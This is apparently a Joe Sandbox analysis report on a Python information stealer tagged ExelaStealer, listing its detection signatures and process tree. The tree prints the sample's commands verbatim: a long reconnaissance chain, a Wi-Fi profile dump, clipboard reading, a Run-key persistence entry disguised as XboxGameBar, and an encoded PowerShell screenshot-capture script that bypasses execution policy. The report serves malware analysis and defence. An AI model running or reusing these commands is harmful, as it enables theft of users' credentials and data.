Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RuntimeusererVers.exe

Overview

General Information

Sample name:RuntimeusererVers.exe
Analysis ID:1556386
MD5:4fd34971f2551e33806360ba5ee86e5e
SHA1:a3f2fe7d770d45c0b98bdbdf3322614582e41d59
SHA256:e82fe9ce4fec710c6f02dc3ed738e5a88955d4d938957ec2b49119d5018ecb81
Tags:exeExelaStealeruser-likeastar20
Infos:

Detection

Python Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Python Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Downloader
Yara detected Generic Python Stealer
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • RuntimeusererVers.exe (PID: 7988 cmdline: "C:\Users\user\Desktop\RuntimeusererVers.exe" MD5: 4FD34971F2551E33806360BA5EE86E5E)
    • conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeusererVers.exe (PID: 8168 cmdline: "C:\Users\user\Desktop\RuntimeusererVers.exe" MD5: D71750B08D81D33E6BEAD1CEB707BC4F)
      • cmd.exe (PID: 884 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 7356 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • tasklist.exe (PID: 7404 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1424 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 7688 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 892 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 1436 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • cmd.exe (PID: 2112 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 6864 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • tasklist.exe (PID: 5916 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6328 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5884 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6088 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • systeminfo.exe (PID: 2600 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 8024 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 7460 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 1836 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 4428 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 1568 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • query.exe (PID: 3888 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 6284 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 2044 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 3324 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 2092 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 2180 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 4252 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 2800 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 2896 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7232 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 7408 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 5292 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 4332 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 6004 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 6164 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 6448 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 1240 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 1412 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 6864 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 5228 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • netsh.exe (PID: 6036 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 1708 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 8164 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4780 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 5100 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 1988 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 7972 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • RuntimeusererVers.exe (PID: 2956 cmdline: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe" MD5: 4FD34971F2551E33806360BA5EE86E5E)
    • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeusererVers.exe (PID: 5288 cmdline: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe" MD5: D71750B08D81D33E6BEAD1CEB707BC4F)
      • cmd.exe (PID: 6036 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • RuntimeusererVers.exe (PID: 6064 cmdline: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe" MD5: 4FD34971F2551E33806360BA5EE86E5E)
    • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeusererVers.exe (PID: 5136 cmdline: "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe" MD5: D71750B08D81D33E6BEAD1CEB707BC4F)
      • cmd.exe (PID: 5876 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
    C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeJoeSecurity_PythonStealerYara detected Python StealerJoe Security
      C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
          C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeJoeSecurity_PythonStealerYara detected Python StealerJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            0000003A.00000002.1621186652.0000010BE9018000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
              0000003A.00000002.1621510779.0000010BE90D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
                00000030.00000002.1538910940.000001E3006F8000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
                  00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmpJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
                    00000030.00000002.1564862815.00007FF72C479000.00000002.00000001.01000000.0000002B.sdmpJoeSecurity_PythonStealerYara detected Python StealerJoe Security
                      Click to see the 33 entries

                      System Summary

                      barindex
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ProcessId: 8168, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XboxGameBar
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMA